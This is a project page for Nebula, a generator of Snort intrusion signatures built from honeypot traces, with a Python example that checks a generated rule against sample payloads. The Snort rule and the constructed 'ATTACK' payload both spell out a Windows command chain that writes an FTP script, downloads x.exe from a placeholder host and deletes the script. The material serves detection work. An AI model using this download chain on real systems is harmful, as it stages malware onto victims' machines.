Nebula

An Intrusion Signature Generator

Overview

Nebula is an intrusion signature generator. It can help secure a network by automatically deriving filter rules from attack traces. In a common setup, nebula runs as a daemon and receives attacks from honeypots. Signatures are currently published in Snort format.

The code was written to be fast. A signature isn't of much value if the generation process takes hours or days. With nebula, you should get a first revision within a few seconds. As more attacks of a kind are submitted, signatures get better and nebula will publish updated revisions.

The signature below was generated by nebula for FTP downloads during multi-stage attacks.

alert tcp any any -> $HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1"; \
 content: "cmd /"; offset: 0; depth: 5; \
 content: " echo open "; distance: 1; within: 17; \
 content: ">> ii &echo user 1 1 >> ii &echo get "; distance: 13; within: 70; \
 content: ">> ii &echo bye >> ii &ftp -n -v -s\:ii &del ii &"; distance: 2; within: 107; \
 sid: 2000001; rev: 1;)
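An added example (not nebula's own code) of checking a generated signature like the one above against sample payloads: it parses the rule's content, offset, depth, distance and within options and emulates Snort's ordered content matching, assuming that a relative window starts `distance` bytes after the previous match and spans `within` bytes. The payloads are constructed for the demonstration, not captured traffic.

```python
import re

# nebula rule 2000001 rev. 1 from above, line continuations joined.
RULE_2000001 = (
    'alert tcp any any -> $HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1"; '
    'content: "cmd /"; offset: 0; depth: 5; '
    'content: " echo open "; distance: 1; within: 17; '
    'content: ">> ii &echo user 1 1 >> ii &echo get "; distance: 13; within: 70; '
    'content: ">> ii &echo bye >> ii &ftp -n -v -s\\:ii &del ii &"; distance: 2; within: 107; '
    'sid: 2000001; rev: 1;)'
)

_CONTENT = re.compile(r'content:\s*"((?:\\.|[^"\\])*)"\s*;'                  # quoted pattern
                      r'((?:\s*(?:offset|depth|distance|within):\s*\d+\s*;)*)')  # its modifiers
_MOD = re.compile(r'(offset|depth|distance|within):\s*(\d+)')


def parse_contents(rule):
    """[(pattern_bytes, {modifier: int}), ...] in rule order. Backslash escapes
    (the \\: in -s\\:ii) are removed; |hex| pipes are not handled (unused above)."""
    out = []
    for quoted, mods in _CONTENT.findall(rule):
        pattern = re.sub(r"\\(.)", r"\1", quoted).encode("latin-1")
        out.append((pattern, {k: int(v) for k, v in _MOD.findall(mods)}))
    return out


def rule_matches(rule, payload):
    """Ordered content matching: offset/depth bound the search window from the
    start of the payload; distance/within are relative to the end of the previous
    match (assumed: window starts `distance` bytes after it, spans `within` bytes)."""
    cursor = 0
    for pattern, m in parse_contents(rule):
        if "distance" in m or "within" in m:
            start = cursor + m.get("distance", 0)
            end = start + m["within"] if "within" in m else len(payload)
        else:
            start = m.get("offset", 0)
            end = start + m["depth"] if "depth" in m else len(payload)
        pos = payload.find(pattern, start, end)  # match must lie entirely in [start, end)
        if pos < 0:
            return False
        cursor = pos + len(pattern)
    return True


# Constructed payloads (RFC 5737 address, placeholder file name), not captured traffic.
ATTACK = (b"cmd /c echo open 192.0.2.10 8555 >> ii &echo user 1 1 >> ii &echo get x.exe "
          b">> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &")
BENIGN = b"cmd /c dir C:\\ >> listing.txt"
```

`rule_matches(RULE_2000001, ATTACK)` is true and the benign command is not matched; a payload whose preamble pushes " echo open " past the 17-byte window also fails, which is the kind of check worth running before deploying a freshly generated revision.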


Nebula has successfully generated signatures for input from honeytrap and argos. Feeding it input from other sources shouldn't be very difficult either. The code archive contains a command-line client that submits data from files to a nebula server. Its code can also serve as a reference implementation for the client-side part of nebula's submission protocol.